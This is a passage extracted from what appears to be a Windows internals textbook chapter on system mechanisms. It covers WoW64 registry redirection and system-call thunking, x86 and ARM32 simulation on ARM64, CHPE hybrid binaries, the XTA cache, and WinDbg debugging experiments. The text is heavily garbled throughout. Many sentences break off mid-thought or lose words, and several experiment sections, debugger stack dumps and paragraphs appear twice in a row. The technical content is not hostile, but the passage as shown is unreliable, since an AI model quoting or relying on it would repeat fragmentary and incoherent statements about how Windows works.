keys (in the position tracked by an anchor node), WoW64 creates a key called WoW6432Node (for x86
application) or WowAA32Node
information. All other portions of the registry are shared between 32-bit and 64-bit applications (for
-
rection and layout explained earlier. The 32-bit application must write exactly these strings using this
case—any other data will be ignored and written normally.
RegOpenKeyEx, RegCreateKeyEx, RegOpenKeyTransacted, RegCreateKeyTransacted, and
RegDeleteKeyEx functions permit this:
I
KEY_WoW64_64KEY Explicitly opens a 64-bit key from either a 32-bit or 64-bit application
I
KEY_WoW64_32KEY Explicitly opens a 32-bit key from either a 32-bit or 64-bit application
X86 simulation on AMD64 platforms
The interface of the x86 simulator for AMD64 platforms (Wow64cpu.dll) is pretty simple. The simulator
process initialization function enables the fast system call interface, depending on the presence of soft-
ware MBEC (Mode Based Execute Control is discussed in Chapter 9). When the WoW64 core starts the
simulation by invoking the BtCpuSimulate
frame (based on the 32-bit CPU context provided by the WoW64 core), initializes the Turbo thunks
112
CHAPTER 8 System mechanisms
set to the 32-bit version of the LdrInitializeThunk loader function). When the CPU executes the far jump,
it detects that the call gate targets a 32-bit segment, thus it changes the CPU execution mode to 32-bit.
The code execution exits 32-bit mode only in case of an interrupt or a system call being dispatched.
More details about call gates are available in the Intel and AMD software development manuals.
Note
to be initialized.
System calls
DLLs that perform interprocess communication, such as Rpcrt4.dll). When a 32-bit application requires
assistance from the OS, it invokes functions located in the special 32-bit versions of the OS libraries.
Like their 64-bit counterparts, the OS routines can perform their job directly in user mode, or they can
require assistance from the NT kernel. In the latter case, they invoke system calls through stub func-
tions like the one implemented in the regular 64-bit Ntdll. The stub places the system call index into a
register, but, instead of issuing the native 32-bit system call instruction, it invokes the WoW64 system
call dispatcher (through the Wow64Transition variable compiled by the WoW64 core).
It emits another far jump for transitioning to the native 64-bit execution mode, exiting from the simula-
captures the parameters associated with the system call and converts them. The conversion process is
called “thunking” and allows machine code executed following the 32-bit ABI to interoperate with 64-bit
values are passed in parameters of each function and accessed through the machine code.
complex data structures provided by the client (but deal with simple input and output values), the
Turbo thunks (small conversion routines implemented in the simulator) take care of the conversion and
directly invoke the native 64-bit API. Other complex APIs need the Wow64SystemServiceEx
assistance, which extracts the correct WoW64 system call table number from the system call index and
invokes the correct WoW64 system call function. WoW64 system calls are implemented in the WoW64
core library and in Wow64win.dll and have the same name as the native system calls but with the
wh-NtCreateFile WoW64 API is called whNtCreateFile.)
After the conversion has been correctly performed, the simulator issues the corresponding na-
tive 64-bit system call. When the native system call returns, WoW64 converts (or thunks) any output
parameters if necessary, from 64-bit to 32-bit formats, and restarts the simulation.
CHAPTER 8 System mechanisms
113
Exception dispatching
Similar to WoW64 system calls, exception dispatching forces the CPU simulation to exit. When an ex-
ception happens, the NT kernel determines whether it has been generated by a thread executing user-
mode code. If so, the NT kernel builds an extended exception frame on the active stack and dispatches
the exception by returning to the user-mode KiUserExceptionDispatcher function in the 64-bit Ntdll (for
more information about exceptions, refer to the “Exception dispatching” section earlier in this chapter).
Note that a 64-bit exception frame (which includes the captured CPU context) is allocated
in the 32-bit stack that was currently active when the exception was generated. Thus, it needs
to be converted before being dispatched to the CPU simulator. This is exactly the role of the
Wow64PrepareForException function (exported by the WoW64 core library), which allocates space on
the native 64-bit stack and copies the native exception frame from the 32-bit stack in it. It then switches
to the 64-bit stack and converts both the native exception and context records to their relative 32-bit
counterpart, storing the result on the 32-bit stack (replacing the 64-bit exception frame). At this point,
the WoW64 Core can restart the simulation from the 32-bit version of the KiUserExceptionDispatcher
function, which dispatches the exception in the same way the native 32-bit Ntdll would.
32-bit user-mode APC delivery follows a similar implementation. A regular user-mode APC is
KiUserApcDispatcher. When the 64-bit kernel is about to dispatch
a user-mode APC to a WoW64 process, it maps the 32-bit APC address to a higher range of 64-bit ad-
dress space. The 64-bit Ntdll then invokes the Wow64ApcRoutine routine exported by the WoW64 core
library, which captures the native APC and context record in user mode and maps it back in the 32-bit
stack. It then prepares a 32-bit user-mode APC and context record and restarts the CPU simulation
from the 32-bit version of the KiUserApcDispatcher function, which dispatches the APC the same way
the native 32-bit Ntdll would.
ARM
ARM is a family of Reduced Instruction Set Computing (RISC) architectures originally designed by
result, there have been multiple releases and versions of the ARM architecture, which have quickly
evolved during the years, starting from very simple 32-bit CPUs, initially brought by the ARMv3 genera-
tion in the year 1993, up to the latest ARMv8. The, latest ARM64v8.2 CPUs natively support multiple
execution modes (or states), most commonly AArch32, Thumb-2, and AArch64:
I
AArch32 is the most classical execution mode, where the CPU executes 32-bit code only and
transfers data to and from the main memory through a 32-bit bus using 32-bit registers.
I
Thumb-2 is an execution state that is a subset of the AArch32 mode. The Thumb instruction set has
been designed for improving code density in low-power embedded systems. In this mode, the CPU
can execute a mix of 16-bit and 32-bit instructions, while still accessing 32-bit registers and memory.
I
AArch64 is the modern execution mode. The CPU in this execution state has access to 64-bit
general purpose registers and can transfer data to and from the main memory through a
64-bit bus.
114
CHAPTER 8 System mechanisms
Windows 10 for ARM64 systems can operate in the AArch64 or Thumb-2 execution mode (AArch32
is generally not used). Thumb-2 was especially used in old Windows RT systems. The current state of
discussed more in depth in Chapter 9 and in the ARM Architecture Reference Manual.
Memory models
In the “Hardware side-channel vulnerabilities” earlier in this chapter, we introduced the concept of
observed while accessed by multiple processors (MESI is one of the most famous cache coherency
protocols). Like the cache coherency protocol, modern CPUs also should provide a memory consis-
tency (or ordering) model for solving another problem that can arise in multiprocessor environments:
memory reordering. Some architectures (ARM64 is an example) are indeed free to re-order memory
access instructions (achieving better performance while accessing the slower memory bus). This kind
of architecture follows a weak memory model, unlike the AMD64 architecture, which follows a strong
memory model, in which memory access instructions are generally executed in program order. Weak
lot of synchronization issues when developing multiprocessor software. In contrast, a strong model is
more intuitive and stable, but it has the big drawback of being slower.
CPUs that can do memory reordering (following the weak model) provide some machine instruc-
tions that act as memory barriers. A barrier prevents the processor from reordering memory accesses
before and after the barrier, helping multiprocessors synchronization issues. Memory barriers are slow;
thus, they are used only when strictly needed by critical multiprocessor code in Windows, especially in
synchronization primitives (like spinlocks, mutexes, pushlocks, and so on).
As we describe in the next section, the ARM64 jitter always makes use of memory barriers while
execute could be run by multiple threads in parallel at the same time (and thus have potential synchro-
nization issues. X86 follows a strong memory model, so it does not have the reordering issue, a part of
generic out-of-order execution as explained in the previous section).
Note Other than the CPU, memory reordering can also affect the compiler, which, during
compilation time, can reorder (and possibly remove) memory references in the source
compiler reordering,
whereas the type described in the previous section is processor reordering.
CHAPTER 8 System mechanisms
115
ARM32 simulation on ARM64 platforms
The simulation of ARM32 applications under ARM64 is performed in a very similar way as for x86 under
AMD64. As discussed in the previous section, an ARM64v8 CPU is capable of dynamic switching between
the AArch64 and Thumb-2 execution state (so it can execute 32-bit instructions directly in hardware).
-
struction, so the WoW64 layer needs to invoke the NT kernel to request the execution mode switch. To do
this, the BtCpuSimulate function, exported by the ARM-on-ARM64 CPU simulator (Wowarmhw.dll), saves
the nonvolatile AArch64 registers in the 64-bit stack, restores the 32-bit context stored in WoW64 CPU
The NT kernel exception handler (which, on ARM64, is the same as the syscall handler), detects that
the exception has been raised due to a system call, thus it checks the syscall number. In case the num-
ber is the special –1, the NT kernel knows that the request is due to an execution mode change coming
from WoW64. In that case, it invokes the KiEnter32BitMode routine, which sets the new execution state
for the lower EL (exception level) to AArch32, dismisses the exception, and returns to user mode.
The code starts the execution in AArch32 state. Like the x86 simulator for AMD64 systems, the execu-
tion controls return to the simulator only in case an exception is raised or a system call is invoked. Both
exceptions and system calls are dispatched in an identical way as for the x86 simulator under AMD64.
X86 simulation on ARM64 platforms
The x86-on-ARM64 CPU simulator (Xtajit.dll) is different from other binary translators described in the
previous sections, mostly because it cannot directly execute x86 instructions using the hardware. The
ARM64 processor is simply not able to understand any x86 instruction. Thus, the x86-on-ARM simula-
tor implements a full x86 emulator and a jitter, which can translate blocks of x86 opcodes in AArch64
code and execute the translated blocks directly.
When the simulator process initialization function (BtCpuProcessInit) is invoked for a new WoW64 pro-
compatibility database.) The simulator then allocates and compiles the Syscall page, which, as the name
implies, is used for emitting x86 syscalls (the page is then linked to Ntdll thanks to the Wow64Transition
variable). At this point, the simulator determines whether the process can use the XTA cache.
The simulator uses two different caches for storing precompiled code blocks: The internal cache is
allocated per-thread and contains code blocks generated by the simulator while compiling x86 code
executed by the thread (those code blocks are called jitted blocks); the external XTA cache is managed
by the XtaCache service and contains all the jitted blocks generated lazily for an x86 image by the
later in this chapter.) The process initialization routine allocates also the Compile Hybrid Executable
(CHPE) bitmap, which covers the entire 4-GB address space potentially used by a 32-bit process. The
bitmap uses a single bit to indicate that a page of memory contains CHPE code (CHPE is described later
in this chapter.)
116
CHAPTER 8 System mechanisms
The simulator thread initialization routine (BtCpuThreadInit) initializes the compiler and allocates
the per-thread CPU state on the native stack, an important data structure that contains the per-thread
compiler state, including the x86 thread context, the x86 code emitter state, the internal code cache,
Simulator’s image load notification
Unlike any other binary translator, the x86-on-ARM64 CPU simulator must be informed any time a new
image is mapped in the process address space, including for the CHPE Ntdll. This is achieved thanks to
the WoW64 core, which intercepts when the NtMapViewOfSection native API is called from the 32-bit
code and informs the Xtajit simulator through the exported BTCpuNotifyMapViewOfSection routine. It
data, such as
I
The CHPE bitmap (which needs to be updated by setting bits to 1 when the target image
contains CHPE code pages)
I
I
The XTA cache state for the image
In particular, whenever a new x86 or CHPE image is loaded, the simulator determines whether it
should use the XTA cache for the module (through registry and application compatibility shim.) In case
the check succeeded, the simulator updates the global per-process XTA cache state by requesting to
the XtaCache service the updated cache for the image. In case the XtaCache service is able to identify
used to speed up the execution of the image. (The section contains precompiled ARM64 code blocks.)
Compiled Hybrid Portable Executables (CHPE)
enough performance to maintain the application responsiveness. One of the major issues is tied to the
memory ordering differences between the two architectures. The x86 emulator does not know how
the original x86 code has been designed, so it is obliged to aggressively use memory barriers between
each memory access made by the x86 image. Executing memory barriers is a slow operation. On aver-
These are the motivations behind the design of Compiled Hybrid Portable Executables (CHPE). A
CHPE binary is a special hybrid executable that contains both x86 and ARM64-compatible code, which
has been generated with full awareness of the original source code (the compiler knew exactly where
to use memory barriers). The ARM64-compatible machine code is called hybrid (or CHPE) code: it is
still executed in AArch64 mode but is generated following the 32-bit ABI for a better interoperability
with x86 code.
CHPE binaries are created as standard x86 executables (the machine ID is still 014C as for x86); the
main difference is that they include hybrid code, described by a table in the Hybrid Image metadata
CHAPTER 8 System mechanisms
117
page containing hybrid code described by the Hybrid metadata. When the jitter compiles the x86 code
block and detects that the code is trying to invoke a hybrid function, it directly executes it (using the
32-bit stack), without wasting any time in any compilation.
The jitted x86 code is executed following a custom ABI, which means that there is a nonstandard
convention on how the ARM64 registers are used and how parameters are passed between functions.
CHPE code does not follow the same register conventions as jitted code (although hybrid code still
follows a 32-bit ABI). This means that directly invoking CHPE code from the jitted blocks built by the
compiler is not directly possible. To overcome this problem, CHPE binaries also include three different
kinds of thunk functions, which allow the interoperability of CHPE with x86 code:
I
A pop thunk allows x86 code to invoke a hybrid function by converting incoming (or outgo-
ing) arguments from the guest (x86) caller to the CHPE convention and by directly transferring
execution to the hybrid code.
I
A push thunk allows CHPE code to invoke an x86 routine by converting incoming (or outgoing)
arguments from the hybrid code to the guest (x86) convention and by calling the emulator to
resume execution on the x86 code.
I
An export thunk is a compatibility thunk created for supporting applications that detour x86
exported from CHPE modules still contain a little amount of x86 code (usually 8 bytes), which
semantically does not provide any sort of functionality but allows detours to be inserted by the
external application.
The x86-on-ARM simulator makes the best effort to always load CHPE system binaries instead of stan-
dard x86 ones, but this is not always possible. In case a CHPE binary does not exist, the simulator will load
the standard x86 one from the SysWow64 folder. In this case, the OS module will be jitted entirely.
EXPERIMENT: Dumping the hybrid code address range table
of a CHPE image. More information about the tool and how to install it are available in Chapter 9.
In this experiment, you will dump the hybrid metadata of kernelbase.dll, a system library that
also has been compiled with CHPE support. You also can try the experiment with other CHPE
-
cd c:\Windows\SyChpe32
link /dump /loadconfig kernelbase.dll > kernelbase_loadconfig.txt
EXPERIMENT: Dumping the hybrid code address range table
of a CHPE image. More information about the tool and how to install it are available in Chapter 9.
In this experiment, you will dump the hybrid metadata of kernelbase.dll, a system library that
also has been compiled with CHPE support. You also can try the experiment with other CHPE
-
cd c:\Windows\SyChpe32
link /dump /loadconfig kernelbase.dll > kernelbase_loadconfig.txt
118
CHAPTER 8 System mechanisms
-
with Notepad and scroll down until you reach the following text:
Section contains the following hybrid metadata:
4 Version
102D900C Address of WowA64 exception handler function pointer
102D9000 Address of WowA64 dispatch call function pointer
102D9004 Address of WowA64 dispatch indirect call function pointer
102D9008 Address of WowA64 dispatch indirect call function pointer (with CFG check)
102D9010 Address of WowA64 dispatch return function pointer
102D9014 Address of WowA64 dispatch leaf return function pointer
102D9018 Address of WowA64 dispatch jump function pointer
102DE000 Address of WowA64 auxiliary import address table pointer
1011DAC8 Hybrid code address range table
4 Hybrid code address range count
Hybrid Code Address Range Table
Address Range
----------------------
x86 10001000 - 1000828F (00001000 - 0000828F)
arm64 1011E2E0 - 1029E09E (0011E2E0 - 0029E09E)
x86 102BA000 - 102BB865 (002BA000 - 002BB865)
arm64 102BC000 - 102C0097 (002BC000 - 002C0097)
range table: two sections contain x86 code (actually not used by the simulator), and two contain
CHPE code (the tool shows the term “arm64” erroneously.)
The XTA cache
As introduced in the previous sections, the x86-on-ARM64 simulator, other than its internal per-thread
cache, uses an external global cache called XTA cache, managed by the XtaCache protected service,
which implements the lazy jitter. The service is an automatic start service, which, when started, opens
service and members of the Administrators group have access to the folder). The service starts its own
-
locates the ALPC and lazy jit worker threads before exiting.
The ALPC worker thread is responsible in dispatching all the incoming requests to the ALPC server.
In particular, when the simulator (the client), running in the context of a WoW64 process, connects to
the XtaCache service, a new data structure tracking the x86 process is created and stored in an internal
(the memory backing the section is internally called Trace buffer). The section is used by the simulator
to send hints about the x86 code that has been jitted to execute the application and was not present in
any cache, together with the module ID to which they belong. The information stored in the section is
-
with Notepad and scroll down until you reach the following text:
Section contains the following hybrid metadata:
4 Version
102D900C Address of WowA64 exception handler function pointer
102D9000 Address of WowA64 dispatch call function pointer
102D9004 Address of WowA64 dispatch indirect call function pointer
102D9008 Address of WowA64 dispatch indirect call function pointer (with CFG check)
102D9010 Address of WowA64 dispatch return function pointer
102D9014 Address of WowA64 dispatch leaf return function pointer
102D9018 Address of WowA64 dispatch jump function pointer
102DE000 Address of WowA64 auxiliary import address table pointer
1011DAC8 Hybrid code address range table
4 Hybrid code address range count
Hybrid Code Address Range Table
Address Range
----------------------
x86 10001000 - 1000828F (00001000 - 0000828F)
arm64 1011E2E0 - 1029E09E (0011E2E0 - 0029E09E)
x86 102BA000 - 102BB865 (002BA000 - 002BB865)
arm64 102BC000 - 102C0097 (002BC000 - 002C0097)
range table: two sections contain x86 code (actually not used by the simulator), and two contain
CHPE code (the tool shows the term “arm64” erroneously.)
CHAPTER 8 System mechanisms
119
processed every 1 second by the XTA cache or in case the buffer becomes full. Based on the number of
valid entries in the list, the XtaCache can decide to directly start the lazy jitter.
When a new image is mapped into an x86 process, the WoW64 layer informs the simulator, which
generated based on the executable image path and its internal binary data. The hashes are important be-
cause they avoid the execution of jitted blocks compiled for an old stale version of the executable image.
module namemodule
header hashmodule path hashmulti/uniproccache file version
The lazy jitter is the engine of the XtaCache. When the service decides to invoke it, a new version of
low-privileged environment (AppContainer process), which runs in low-priority mode. The only job of
the compiler is to compile the x86 code executed by the simulator. The new code blocks are added to the
EXPERIMENT: Witnessing the XTA cache
Newer versions of Process Monitor can run natively on ARM64 environments. You can use
In this experiment, you need an ARM64 system running at least Windows 10 May 2019 update
(1903). Initially, you need to be sure that the x86 application used for the experiment has never
before been executed by the system. In this example, we will install an old x86 version of MPC-HC
media player, which can be downloaded from https://sourceforge.net/projects/mpc-hc/files/lat-
est/download. Any x86 application is well suited for this experiment though.
Install MPC-HC (or your preferred x86 application), but, before running it, open Process
EXPERIMENT: Witnessing the XTA cache
Newer versions of Process Monitor can run natively on ARM64 environments. You can use
In this experiment, you need an ARM64 system running at least Windows 10 May 2019 update
(1903). Initially, you need to be sure that the x86 application used for the experiment has never
before been executed by the system. In this example, we will install an old x86 version of MPC-HC
media player, which can be downloaded from https://sourceforge.net/projects/mpc-hc/files/lat-
est/download. Any x86 application is well suited for this experiment though.
Install MPC-HC (or your preferred x86 application), but, before running it, open Process
120
CHAPTER 8 System mechanisms
Then launch MPC-HC and try to play some video. Exit MPC-HC and stop the event capturing in
this experiment, you are not interested in the registry).
compile the x86 image on its own and periodically sent information to the XtaCache. Later, the
lazy jitter would have been invoked by a worker thread in the XtaCache. The latter created a new
both itself and Xtac:
If you restart the experiment, you would see different events in Process Monitor: The cache
execute it directly. As a result, the execution time should be faster. You can also try to delete the
MPC-HC x86 application again.
command prompt window and insert the following commands:
takeown /f c:\windows\XtaCache
icacls c:\Windows\XtaCache /grant Administrators:F
Then launch MPC-HC and try to play some video. Exit MPC-HC and stop the event capturing in
this experiment, you are not interested in the registry).
compile the x86 image on its own and periodically sent information to the XtaCache. Later, the
lazy jitter would have been invoked by a worker thread in the XtaCache. The latter created a new
both itself and Xtac:
If you restart the experiment, you would see different events in Process Monitor: The cache
execute it directly. As a result, the execution time should be faster. You can also try to delete the
MPC-HC x86 application again.
command prompt window and insert the following commands:
takeown /f c:\windows\XtaCache
icacls c:\Windows\XtaCache /grant Administrators:F
CHAPTER 8 System mechanisms
121
Jitting and execution
To start the guest process, the x86-on-ARM64 CPU simulator has no other chances than interpreting
or jitting the x86 code. Interpreting the guest code means translating and executing one machine
instruction at time, which is a slow process, so the emulator supports only the jitting strategy: it
dynamically compiles x86 code to ARM64 and stores the result in a guest “code block” until certain
conditions happen:
I
An illegal opcode or a data or instruction breakpoint have been detected.
I
A branch instruction targeting an already-visited block has been encountered.
I
The block is bigger than a predetermined limit (512 bytes).
(indexed by its RVA) already exists. If the block exists in the cache, the simulator directly executes it
using a dispatcher routine, which builds the ARM64 context (containing the host registers values) and
stores it in the 64-bit stack, switches to the 32-bit stack, and prepares it for the guest x86 thread state.
pop thunk used for transferring the execution from a CHPE to an x86 context.
When the execution of the code block ends, the dispatcher does the opposite: It saves the new x86
context in the 32-bit stack, switches to the 64-bit stack, and restores the old ARM64 context containing
the state of the simulator. When the dispatcher exits, the simulator knows the exact x86 virtual address
where the execution was interrupted. It can then restart the emulation starting from that new memory
address. Similar to cached entries, the simulator checks whether the target address points to a memory
page containing CHPE code (it knows this information thanks to the global CHPE bitmap). If that is the
cache, and directly executes it.
executing native images. Otherwise, it needs to invoke the compiler for building the native translated
code block. The compilation process is split into three phases:
1.
The parsing stage builds instructions descriptors for each opcode that needs to be added in
the code block.
2.
The optimization
3.
code generation
The generated code block is then added to the per-thread local cache. Note that the simulator
cannot add it in the XTA cache, mainly for security and performance reasons. Otherwise, an attacker
would be allowed to pollute the cache of a higher-privileged process (as a result, the malicious code
the simulator does not have enough CPU time to generate highly optimized code (even though there is
122
CHAPTER 8 System mechanisms
However, information about the compiled x86 blocks, together with the ID of the binary hosting
the x86 code, are inserted into the list mapped by the shared Trace buffer. The lazy jitter of the XTA
cache knows that it needs to compile the x86 code jitted by the simulator thanks to the Trace buffer. As
than the others.
System calls and exception dispatching
Under the x86-on-ARM64 CPU simulator, when an x86 thread performs a system call, it invokes the
code located in the syscall page allocated by the simulator, which raises the exception 0x2E. Each x86
exception forces the code block to exit. The dispatcher, while exiting from the code block, dispatches
the exception through an internal function that ends up in invoking the standard WoW64 exception
handler or system call dispatcher (depending on the exception vector number.) Those have been al-
ready discussed in the previous X86 simulation on AMD64 platforms section of this chapter.
EXPERIMENT: Debugging WoW64 in ARM64 environments
Newer releases of WinDbg (the Windows Debugger) are able to debug machine code run under
any simulator. This means that in ARM64 systems, you will be able to debug native ARM64, ARM
Thumb-2, and x86 applications, whereas in AMD64 systems, you can debug only 32- and 64-bit
x86 programs. The debugger is also able to easily switch between the native 64-bit and 32-bit
stacks, which allows the user to debug both native (including the WoW64 layer and the emulator)
and guest code (furthermore, the debugger also supports CHPE.)
In this experiment, you will open an x86 application using an ARM64 machine and switch
installing one of the kits, open the ARM64 version of Windbg (available from the Start menu.)
generates, like Data Misaligned and in-page I/O errors (these exceptions are already handled
Debug menu, click Event FiltersData
Misaligned event and check the Ignore option box from the Execution group. Repeat the same
for the In-page I/O-
EXPERIMENT: Debugging WoW64 in ARM64 environments
Newer releases of WinDbg (the Windows Debugger) are able to debug machine code run under
any simulator. This means that in ARM64 systems, you will be able to debug native ARM64, ARM
Thumb-2, and x86 applications, whereas in AMD64 systems, you can debug only 32- and 64-bit
x86 programs. The debugger is also able to easily switch between the native 64-bit and 32-bit
stacks, which allows the user to debug both native (including the WoW64 layer and the emulator)
and guest code (furthermore, the debugger also supports CHPE.)
In this experiment, you will open an x86 application using an ARM64 machine and switch
installing one of the kits, open the ARM64 version of Windbg (available from the Start menu.)
generates, like Data Misaligned and in-page I/O errors (these exceptions are already handled
Debug menu, click Event FiltersData
Misaligned event and check the Ignore option box from the Execution group. Repeat the same
for the In-page I/O-
CHAPTER 8 System mechanisms
123
Click Close, and then from the main debugger interface, select Open Executable from the
File
folder. (In this example, we are using notepad.exe, but any x86 application works.) Also open
correctly (refer to the https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/
symbol-path-
k command:
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`001eec70 00007ffb`bd47de00 ntdll!LdrpDoDebuggerBreak+0x2c
01 00000000`001eec90 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1da8
02 00000000`001ef580 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
03 00000000`001ef660 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
04 00000000`001ef680 00000000`00000000 ntdll!LdrInitializeThunk+0x14
The simulator is still not loaded at this time: The native and CHPE Ntdll have been mapped
into the target binary by the NT kernel, while the WoW64 core binaries have been loaded by the
native Ntdll just before the breakpoint via the LdrpLoadWow64 function. You can check that by
enumerating the currently loaded modules (via the lm command) and by moving to the next
frame in the stack via the .f+ command. In the disassembly window, you should see the invoca-
tion of the LdrpLoadWow64 routine:
00007ffb`bd47dde4 97fed31b bl
ntdll!LdrpLoadWow64 (00007ffb`bd432a50)
Click Close, and then from the main debugger interface, select Open Executable from the
File
folder. (In this example, we are using notepad.exe, but any x86 application works.) Also open
correctly (refer to the https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/
symbol-path-
k command:
k command:
k
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`001eec70 00007ffb`bd47de00 ntdll!LdrpDoDebuggerBreak+0x2c
01 00000000`001eec90 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1da8
02 00000000`001ef580 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
03 00000000`001ef660 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
04 00000000`001ef680 00000000`00000000 ntdll!LdrInitializeThunk+0x14
The simulator is still not loaded at this time: The native and CHPE Ntdll have been mapped
into the target binary by the NT kernel, while the WoW64 core binaries have been loaded by the
native Ntdll just before the breakpoint via the LdrpLoadWow64 function. You can check that by
enumerating the currently loaded modules (via the lm command) and by moving to the next
frame in the stack via the .f+ command. In the disassembly window, you should see the invoca-
tion of the LdrpLoadWow64 routine:
00007ffb`bd47dde4 97fed31b bl
ntdll!LdrpLoadWow64 (00007ffb`bd432a50)
124
CHAPTER 8 System mechanisms
Now resume the execution with the g command (or F5 key). You should see multiple modules
being loaded in the process address space and another breakpoint raising, this time under the
x86 context. If you again display the stack via the k command, you can notice that a new column
0:000:x86> k
# Arch ChildEBP RetAddr
00 x86 00acf7b8 77006fb8 ntdll_76ec0000!LdrpDoDebuggerBreak+0x2b
01 CHPE 00acf7c0 77006fb8 ntdll_76ec0000!#LdrpDoDebuggerBreak$push_thunk+0x48
02 CHPE 00acf820 76f44054 ntdll_76ec0000!#LdrpInitializeProcess+0x20ec
03 CHPE 00acfad0 76f43e9c ntdll_76ec0000!#_LdrpInitialize+0x1a4
04 CHPE 00acfb60 76f43e34 ntdll_76ec0000!#LdrpInitialize+0x3c
05 CHPE 00acfb80 76ffc3cc ntdll_76ec0000!LdrInitializeThunk+0x14
If you compare the new stack to the old one, you will see that the stack addresses have drasti-
cally changed (because the process is now executing using the 32-bit stack). Note also that some
containing CHPE code. At this point, you can step into and over x86 code, as in regular x86
operating systems. The simulator takes care of the emulation and hides all the details. To observe
how the simulator is running, you should move to the 64-bit context through the .effmach
command. The command accepts different parameters: x86 for the 32-bit x86 context; arm64 or
amd64 for the native 64-bit context (depending on the target platform); arm for the 32-bit ARM
Thumb2 context; CHPE for the 32-bit CHPE context. Switching to the 64-bit stack in this case is
achieved via the arm64 parameter:
0:000:x86> .effmach arm64
Effective machine: ARM 64-bit (AArch64) (arm64)
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`00a8df30 00007ffb`bd3572a8 wow64!Wow64pNotifyDebugger+0x18f54
01 00000000`00a8df60 00007ffb`bd3724a4 wow64!Wow64pDispatchException+0x108
02 00000000`00a8e2e0 00000000`76e1e9dc wow64!Wow64RaiseException+0x84
03 00000000`00a8e400 00000000`76e0ebd8 xtajit!BTCpuSuspendLocalThread+0x24c
04 00000000`00a8e4c0 00000000`76de04c8 xtajit!BTCpuResetFloatingPoint+0x4828
05 00000000`00a8e530 00000000`76dd4bf8 xtajit!BTCpuUseChpeFile+0x9088
06 00000000`00a8e640 00007ffb`bd3552c4 xtajit!BTCpuSimulate+0x98
07 00000000`00a8e6b0 00007ffb`bd353788 wow64!RunCpuSimulation+0x14
08 00000000`00a8e6c0 00007ffb`bd47de38 wow64!Wow64LdrpInitialize+0x138
09 00000000`00a8e980 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1de0
0a 00000000`00a8f270 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
0b 00000000`00a8f350 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
0c 00000000`00a8f370 00000000`00000000 ntdll!LdrInitializeThunk+0x14
thunk has been invoked to restart the simulation to the LdrpDoDebuggerBreak x86 function,
which caused an exception (managed through the native Wow64RaiseException
debugger via the Wow64pNotifyDebugger routine. With Windbg and the .effmach command,
you can effectively debug multiple contexts: native, CHPE, and x86 code. Using the g @$exen-
try command, you can move to the x86 entry point of Notepad and continue the debug session
of x86 code or the emulator itself. You can restart this experiment also in different environments,
debugging an app located in SysArm32, for example.
Now resume the execution with the g command (or F5 key). You should see multiple modules
being loaded in the process address space and another breakpoint raising, this time under the
x86 context. If you again display the stack via the k command, you can notice that a new column
k command, you can notice that a new column
k
0:000:x86> k
# Arch ChildEBP RetAddr
00 x86 00acf7b8 77006fb8 ntdll_76ec0000!LdrpDoDebuggerBreak+0x2b
01 CHPE 00acf7c0 77006fb8 ntdll_76ec0000!#LdrpDoDebuggerBreak$push_thunk+0x48
02 CHPE 00acf820 76f44054 ntdll_76ec0000!#LdrpInitializeProcess+0x20ec
03 CHPE 00acfad0 76f43e9c ntdll_76ec0000!#_LdrpInitialize+0x1a4
04 CHPE 00acfb60 76f43e34 ntdll_76ec0000!#LdrpInitialize+0x3c
05 CHPE 00acfb80 76ffc3cc ntdll_76ec0000!LdrInitializeThunk+0x14
If you compare the new stack to the old one, you will see that the stack addresses have drasti-
cally changed (because the process is now executing using the 32-bit stack). Note also that some
containing CHPE code. At this point, you can step into and over x86 code, as in regular x86
operating systems. The simulator takes care of the emulation and hides all the details. To observe
how the simulator is running, you should move to the 64-bit context through the .effmach
command. The command accepts different parameters: x86 for the 32-bit x86 context; arm64 or
amd64 for the native 64-bit context (depending on the target platform); arm for the 32-bit ARM
Thumb2 context; CHPE for the 32-bit CHPE context. Switching to the 64-bit stack in this case is
achieved via the arm64 parameter:
0:000:x86> .effmach arm64
Effective machine: ARM 64-bit (AArch64) (arm64)
0:000> k
# Child-SP
RetAddr
Call Site
00 00000000`00a8df30 00007ffb`bd3572a8 wow64!Wow64pNotifyDebugger+0x18f54
01 00000000`00a8df60 00007ffb`bd3724a4 wow64!Wow64pDispatchException+0x108
02 00000000`00a8e2e0 00000000`76e1e9dc wow64!Wow64RaiseException+0x84
03 00000000`00a8e400 00000000`76e0ebd8 xtajit!BTCpuSuspendLocalThread+0x24c
04 00000000`00a8e4c0 00000000`76de04c8 xtajit!BTCpuResetFloatingPoint+0x4828
05 00000000`00a8e530 00000000`76dd4bf8 xtajit!BTCpuUseChpeFile+0x9088
06 00000000`00a8e640 00007ffb`bd3552c4 xtajit!BTCpuSimulate+0x98
07 00000000`00a8e6b0 00007ffb`bd353788 wow64!RunCpuSimulation+0x14
08 00000000`00a8e6c0 00007ffb`bd47de38 wow64!Wow64LdrpInitialize+0x138
09 00000000`00a8e980 00007ffb`bd47133c ntdll!LdrpInitializeProcess+0x1de0
0a 00000000`00a8f270 00007ffb`bd428180 ntdll!_LdrpInitialize+0x491ac
0b 00000000`00a8f350 00007ffb`bd428134 ntdll!LdrpInitialize+0x38
0c 00000000`00a8f370 00000000`00000000 ntdll!LdrInitializeThunk+0x14
thunk has been invoked to restart the simulation to the LdrpDoDebuggerBreak x86 function,
LdrpDoDebuggerBreak x86 function,
LdrpDoDebuggerBreak
which caused an exception (managed through the native Wow64RaiseException
debugger via the Wow64pNotifyDebugger routine. With Windbg and the .effmach command,
you can effectively debug multiple contexts: native, CHPE, and x86 code. Using the g @$exen-
try command, you can move to the x86 entry point of Notepad and continue the debug session
of x86 code or the emulator itself. You can restart this experiment also in different environments,
debugging an app located in SysArm32, for example.
CHAPTER 8 System mechanisms
125
Object Manager
As mentioned in Chapter 2 of Part 1, “System architecture,” Windows implements an object model to
provide consistent and secure access to the various internal services implemented in the executive. This
section describes the Windows Object Manager, the executive component responsible for creating,
